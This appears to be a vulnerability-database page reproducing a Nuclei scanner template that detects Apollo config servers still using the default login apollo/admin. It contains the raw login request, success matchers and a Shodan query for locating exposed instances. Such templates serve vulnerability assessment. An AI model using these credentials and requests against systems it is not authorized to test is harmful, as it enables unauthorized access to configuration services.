apollo-default-login: Apollo Default Login

日期: 2025-08-01 | 影响软件: Apollo Default Login | POC: 已公开

漏洞描述

An Apollo default login was discovered.

PoC代码[已公开]

id: apollo-default-login

info:
  name: Apollo Default Login
  author: PaperPen
  severity: high
  description: An Apollo default login was discovered.
  reference:
    - https://github.com/apolloconfig/apollo
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
    cpe: cpe:2.3:a:ctrip:apollo:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    shodan-query: http.favicon.hash:11794165
    product: apollo
    vendor: ctrip
  tags: apollo,default-login,vuln

http:
  - raw:
      - |
        POST /signin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/signin?

        username={{user}}&password={{pass}}&login-submit=Login
      - |
        GET /user HTTP/1.1
        Host: {{Hostname}}

    attack: pitchfork
    payloads:
      user:
        - apollo
      pass:
        - admin

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"userId":'
          - '"email":'
        condition: or

      - type: dsl
        dsl:
          - "status_code_1 == 302 && status_code_2 == 200"
          - "contains(tolower(header_2), 'application/json')"
        condition: and
# digest: 4a0a00473045022100ca1858d05e7c6d9bbb65b3386d7fa3cfdbff532776299d17064660b9468494cf0220509409898b733bb4c3db8b598cb2ef09fb48e657027bc64f1cf6fde8abead413:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/apollo/apollo-default-login.yaml